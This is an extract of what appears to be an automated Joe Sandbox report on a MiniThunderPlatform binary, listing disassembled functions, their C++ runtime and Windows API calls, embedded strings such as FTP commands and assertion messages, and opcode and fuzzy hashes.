                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,00000000), ref: 100B42C0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100B42F6
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B23A3
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B23B4
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B23EB
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2400
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B2424
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2438
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000001,00000000), ref: 100B246D
                                                                                                                                                • Part of subcall function 100B1540: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_dphub_res,?), ref: 100B1622
                                                                                                                                                • Part of subcall function 100B1540: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B1651
                                                                                                                                                • Part of subcall function 100B1540: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_nondphub_res), ref: 100B1660
                                                                                                                                                • Part of subcall function 100B1540: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B169F
                                                                                                                                                • Part of subcall function 100B3A20: __RTDynamicCast.MSVCR71(?,00000000,103010A4,103010CC,00000000,?,?,?), ref: 100B3A86
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$??0?$basic_string@$??$?8D@1@@std@@V?$basic_string@$D@2@@0@$CastD@2@@0@0@DynamicH_prologV01@@
                                                                                                                                              • String ID: -1 == _exit_state$.\p2s_task_event_handler.cpp$thunder_assert
                                                                                                                                              • API String ID: 4102141786-1101966026
                                                                                                                                              • Opcode ID: 82726282dad65c50140c188e0101c2189b5224b5c73e2698c1e7421e98aea3d4
                                                                                                                                              • Instruction ID: 50fa3eb72d89b31d591c5a0a5fa0c776cec88d025345920ecbc5af57987afb2e
                                                                                                                                              • Opcode Fuzzy Hash: 82726282dad65c50140c188e0101c2189b5224b5c73e2698c1e7421e98aea3d4
                                                                                                                                              • Instruction Fuzzy Hash: 8E517A782047409FD714DF64C895BABB7E5FF89744F04090CF99A87392DB74A909CB62
                                                                                                                                              Function 10050230 Relevance: 10.7, APIs: 7, Instructions: 158COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(1027DEE0,?,?,?,?,?,?,?,?,?,?,?,?,?,1024495F,000000FF), ref: 100502CE
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,100507A0), ref: 10050322
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1005035B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,?,?), ref: 10050380
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1005039B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?), ref: 100503BD
                                                                                                                                                • Part of subcall function 1021ADD0: WaitForSingleObject.KERNEL32(?,000000FF,?,10035F03,?,?), ref: 1021ADE5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CriticalDeleteSection$ObjectSingleWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4287628598-0
                                                                                                                                              • Opcode ID: dd391b9e3e40d7fb6a3693f0ac732bd256af0d0e9b3700218e61569a86700ca5
                                                                                                                                              • Instruction ID: 37c0fefbd7fa45fd5a3b716990013d133868753b0abaa8172d990299f2dff57f
                                                                                                                                              • Opcode Fuzzy Hash: dd391b9e3e40d7fb6a3693f0ac732bd256af0d0e9b3700218e61569a86700ca5
                                                                                                                                              • Instruction Fuzzy Hash: 4D515AB56047419FCB10CF58C884A9ABBE4FF48300F54896DF8AA8B352D775E949CB92
                                                                                                                                              Function 1009D1C0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 155COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1009D307
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV01@@
                                                                                                                                              • String ID: .\ftp_data_pipe.cpp$_data_reader != NULL$false$operation_ptr == _data_operation$thunder_assert
                                                                                                                                              • API String ID: 3035900898-3070126095
                                                                                                                                              • Opcode ID: 432bd2b81d3add5fd0d3ae9b0f5db570b51e0a9256b2eed3a28a2b18341fc16f
                                                                                                                                              • Instruction ID: de1ffd4ef0cb071524970632516e9fa21b4a03b3e46d121c7c950e4bcc43f202
                                                                                                                                              • Opcode Fuzzy Hash: 432bd2b81d3add5fd0d3ae9b0f5db570b51e0a9256b2eed3a28a2b18341fc16f
                                                                                                                                              • Instruction Fuzzy Hash: C151DF75A002459FC700EF68D881B9AF3F9FB55355F20C56EE5199B382DB31BA01CB91
                                                                                                                                              Function 100A1630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102780D0), ref: 100A1668
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A167F
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                                • Part of subcall function 1009D410: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                                • Part of subcall function 1009D410: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                                • Part of subcall function 1009D410: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                                • Part of subcall function 1009D410: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100A16A4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A16B6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$D@1@@std@@D@2@@0@V01@V?$basic_string@Y?$basic_string@$??$?8??$?9?append@?$basic_string@V01@@V12@V12@@
                                                                                                                                              • String ID: PBSZ
                                                                                                                                              • API String ID: 1619824903-2206154605
                                                                                                                                              • Opcode ID: f5f87f67407bad9c04671ce6c1582df74752a45e775bf5652b43cefc16b23df9
                                                                                                                                              • Instruction ID: a7aedcd50fcebef51eefe1a767a336ad6ad04be98cec62c7ca5e5039c318ea40
                                                                                                                                              • Opcode Fuzzy Hash: f5f87f67407bad9c04671ce6c1582df74752a45e775bf5652b43cefc16b23df9
                                                                                                                                              • Instruction Fuzzy Hash: AD21D139108790CFD315DF58C9597DABBE5FB98B50F404A5DF09A43380DB78A948CB92
                                                                                                                                              Function 100ED64F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100ED654
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(peer://,?,?), ref: 100ED675
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?), ref: 100ED681
                                                                                                                                              • strncmp.MSVCR71(?,?,00000010), ref: 100ED6B0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100ED6CC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??$?8??0?$basic_string@??1?$basic_string@D@1@@std@@D@2@@0@0@H_prologV?$basic_string@strncmp
                                                                                                                                              • String ID: peer://
                                                                                                                                              • API String ID: 801140595-703096036
                                                                                                                                              • Opcode ID: 14810c240a5009f266545453e066382fa86d699d70cc74eba38641144717913d
                                                                                                                                              • Instruction ID: 7f780f79f952fc64a2abe286541e6ebbfb8d974ec09ed8027b23ce6a73601aff
                                                                                                                                              • Opcode Fuzzy Hash: 14810c240a5009f266545453e066382fa86d699d70cc74eba38641144717913d
                                                                                                                                              • Instruction Fuzzy Hash: 4B11C132900224DFCB24DBA9DC4DADEF774EF19720F50421AE806B3190CB706944CB94
                                                                                                                                              Function 1004C150 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 1004C171
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1004C183
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1004C19E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1004C1BB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,102768C4,102B1FC0), ref: 1004C1E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 4098190477-3788999226
                                                                                                                                              • Opcode ID: 9f78fe217280e096d2d8566c69699e10f53a1d91385612a67eec8a57ae96b314
                                                                                                                                              • Instruction ID: 425309589764f26cd2d05e3ab834e60d2f34af0ba2d14eda99c2b3abe5746cc0
                                                                                                                                              • Opcode Fuzzy Hash: 9f78fe217280e096d2d8566c69699e10f53a1d91385612a67eec8a57ae96b314
                                                                                                                                              • Instruction Fuzzy Hash: DD017CB10082909BC321DB54C848B9BBBE4FB69708F448A1CF49A92280C7769549CB67
                                                                                                                                              Function 100C438F Relevance: 10.5, APIs: 7, Instructions: 33COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4394
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43B3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43C3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43D3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43E3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43F3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C4403
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF4E
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF5C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1526739352-0
                                                                                                                                              • Opcode ID: b96752d68a2be1221daffcd9754adf75e04174de44b33252d187116ae2b68897
                                                                                                                                              • Instruction ID: ddb2fe5185157bb445da9e9e88965939a89934cc9aada8149fef7bba4282653f
                                                                                                                                              • Opcode Fuzzy Hash: b96752d68a2be1221daffcd9754adf75e04174de44b33252d187116ae2b68897
                                                                                                                                              • Instruction Fuzzy Hash: 460129345016AADFEB25DFA4C54C7DDBBB0AB29704F1046CDE4AB53282CBB42648CB51
                                                                                                                                              Function 10034210 Relevance: 9.2, APIs: 6, Instructions: 191COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 10034248
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(-00000004), ref: 10034285
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000,?,?,?,?,?), ref: 1003436D
                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?), ref: 1003437A
                                                                                                                                              • AtlComPtrAssign.ATL71 ref: 1003438D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AssignCriticalSection$EnterEventLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3959862259-0
                                                                                                                                              • Opcode ID: 0ea8ad132e92c4cd0587013c1e70eda63fce18ead077faa1b73ad1b5e9e5a1c5
                                                                                                                                              • Instruction ID: d9599ab6a1949e13bd139a8ee9f40f5d621c2f3007966a20f2e4d4ccea4ef9a2
                                                                                                                                              • Opcode Fuzzy Hash: 0ea8ad132e92c4cd0587013c1e70eda63fce18ead077faa1b73ad1b5e9e5a1c5
                                                                                                                                              • Instruction Fuzzy Hash: B37169392083859FC316CF64C484B9BB7E5EB89601F46496CF88A9F251DB30FD49CB91
                                                                                                                                              Function 10099293 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10095510: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Type,?,00000000,?,?,?,?,00000000,1024AC69,000000FF,100992A7), ref: 10095549
                                                                                                                                                • Part of subcall function 10095510: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10095572
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992C7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100992D4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10099303
                                                                                                                                              • memcpy.MSVCR71(00000000,?,?), ref: 10099382
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100993A4
                                                                                                                                                • Part of subcall function 10095E80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10095EF3
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F0A
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F19
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?assign@?$basic_string@V12@V12@@$V01@@memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1542101914-0
                                                                                                                                              • Opcode ID: 694d51c6d6d15dde5a7fae030bf1126a9dcaa3bbb63f1c64ebb13785a5803b63
                                                                                                                                              • Instruction ID: 69ff786a6b2868905cf93619dc7690a5059ab46d6cd91959c2a1281b613005c5
                                                                                                                                              • Opcode Fuzzy Hash: 694d51c6d6d15dde5a7fae030bf1126a9dcaa3bbb63f1c64ebb13785a5803b63
